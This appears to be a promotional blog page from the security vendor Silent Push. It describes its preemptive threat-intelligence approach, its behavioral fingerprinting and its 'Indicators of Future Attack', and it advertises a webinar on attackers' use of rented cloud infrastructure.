How does Silent Push profile attacker behavior? 

At Silent Push, Preemptive Threat Intelligence works in a similar way, but in the digital world.

Instead of only relying on information that’s easily obtainable and available everywhere – such as a domain that’s already been involved in an attack – it’s essential to understand a threat actor’s motivation and modus operandi, and use their own methods as identifiers against them to anticipate and prevent any future attacks. 

Silent Push achieves this through our unique digital behavioral fingerprinting process.

We go beyond stale lists of post-breach IOCs, and help security teams to proactively profile threat actor behavior in a way that makes it easy to understand how they set up their infrastructure before an attack, and where to expect the next digital assault.


Our digital behavioral fingerprint breaks down a domain, website or IP address into hundreds of searchable categories, and connects the dots between billions of datapoints across the Internet by giving security teams a comprehensive criminal profile of online threat activity, wherever it occurs and whoever is propagating it. 

How does Silent Push provide a cyber early warning system to stop hidden attacks? 

Behavioral fingerprints and IOFA™ are unique to Silent Push. No other threat intelligence provider has the same ability to scan, aggregate, and correlate global Internet data, and deliver it in a way that makes it immediately actionable, and easy to use, in the form of IOFA™. 

Think of all the questions your team needs to answer as they track down malicious infrastructure targeting your organization… 

What favicon is that brand impersonation site using that’s targeting your organization, and what are all the other domains that have ever used that favicon? What domains are linked with the same nameserver? How has that threat actor moved between different hosting providers? Where are they now, where have they been before, and where are they likely to go to next? How does that website interact with users, and what other sites behave in the same way? 

All of this, and more, is available only within Silent Push. 



Webinar – Infrastructure Laundering

In the evolving landscape of cyber threats, attackers are increasingly exploiting legitimate cloud services to mask their malicious activities – a tactic we term “Infrastructure Laundering.”

By renting IP addresses from reputable providers like Amazon Web Services and Microsoft Azure, threat actors such as the FUNNULL content delivery network (CDN) can seamlessly integrate illicit operations into mainstream infrastructure. This approach not only complicates detection but also challenges traditional security measures.

Access Webinar

What we cover: 

In this session, Silent Push Director of Threat Intelligence Kasey Best covers:

  • What is Infrastructure Laundering?
  • The evolution of adversaries: How and why threat actors are jumping on this trend
  • How to detect Infrastructure Laundering in real-time with Silent Push preemptive threat intelligence
  • Case Study: Triad Nexus and FUNNULL CDN Infrastructure Laundering
  • Ethical concerns for Big Tech
  • Mitigation and Q&A

Who should watch: 

Anyone seeking cutting-edge strategies to preemptively detect and mitigate threats. 


Ready to dive deeper into the world of preemptive threat intelligence? Begin your journey with the Silent Push free Community Edition today.

What Is Preemptive Threat Intelligence?

Preemptive Threat Intelligence is the practice of identifying threat infrastructure as it’s being set up, and before an adversary launches an attack. 

The data used in Preemptive Threat Intelligence provides teams with the ability to proactively respond to threats using enhanced insights, feeds and automated queries that reveal known and hidden infrastructure. 

In this blog, we’ll explore the concept of preemptive threat intelligence by explaining how much of global threat infrastructure is known at any one time and why organizations need to adopt a preemptive approach to threat intelligence, before explaining how Silent Push is helping organizations detect and block hidden threats more quickly and effectively with its unique Indicators of Future Attack™.

Did you know that only 2% of threat infrastructure is known? 

Most security teams rely on inadequate threat intelligence data that does not reveal the full extent of an attack. 

As little as 2% of the infrastructure used by a threat actor in an attack is being tracked at any given point in time, with the remainder lurking under the surface and out of reach of traditional detection methods. 

Known and hidden threat infrastructure

This means that cyber defenders and threat hunters are operating mostly in the dark, as they attempt to understand where attacks originate from, and where they may appear next. 

Organizations need to have the ability to go beyond the 2% that’s easily detectable, and dive under the surface of the water to establish just how far down the iceberg goes – and what it’s actually made of – to make sure they’re better positioned to prevent a breach. 

Why is 98% of threat infrastructure hidden? 

Like any criminal, threat actors continually change their attack strategies to cover their tracks, and avoid detection. 

They understand and monitor traditional approaches to security that rely on stale lists (feeds) of domains and IPs that tell teams where an attack has BEEN, rather than where it’s coming FROM, and are constantly cycling through large amounts of infrastructure to cover their tracks. 

These feeds do not contain all the linked infrastructure used by a threat actor, and only contain publicly known Indicators of Compromise (IOCs).

What if you could take one piece of infrastructure that is currently visible in an attack, and get insight on how it’s moved across the Internet, along with all the other pieces of Internet data it’s associated with, how it’s hosted (or has ever been hosted), and how it all fits together? 

These are the elements that are impossible for teams to reveal using a standard approach, and this is what makes up the 98% that’s currently hidden to the rest of the security industry. 

Why are organizations adopting Preemptive Threat Intelligence? 

Let’s use an analogy. You’re lucky enough to own a large house, on a sprawling estate, with multiple potential entry points dotted around that need to be monitored and secured 24/7. 


Would you rather rely on an alarm system that tells you when an intruder is at the door (or worse still, when they’re in your house), or would you prefer to get alerted when they’re on their way and before they get anywhere near your neighborhood, so that you can stop them before they get to you? 

This is why security teams are pivoting away from legacy “at the gates” detection mechanisms. 

Preemptive Threat Intelligence data needs to deliver a cyber early warning system that stops criminals before they arrive at your organization’s digital front door – wherever that may be. 

How Silent Push Preemptive Threat Intelligence exposes threats and minimizes the risk of an attack 

Silent Push was started in 2020 by security industry veterans to improve the world’s ability to counteract global cybercrime. 

Our founders are determined to provide the most innovative solution to address the growing imbalance of security teams wasting time and resources fumbling around for information on hidden threat infrastructure, and increasing their organization’s exposure to an attack. 

Silent Push is the first and ONLY cybersecurity platform to deliver Indicators Of Future Attack (IOFA)™ – immediately actionable preemptive threat intelligence data that informs teams where attacks are coming FROM, in addition to where they have been. 

Our early warning system stops the burglar from ever entering your neighborhood, let alone your property, by giving your teams the ability to locate the 98% of threat infrastructure that they aren’t currently able to pinpoint. 

We do this by mapping out the relationship between billions of Internet data points using proprietary technology that gives security teams a 360-degree picture of any given attack landscape. 
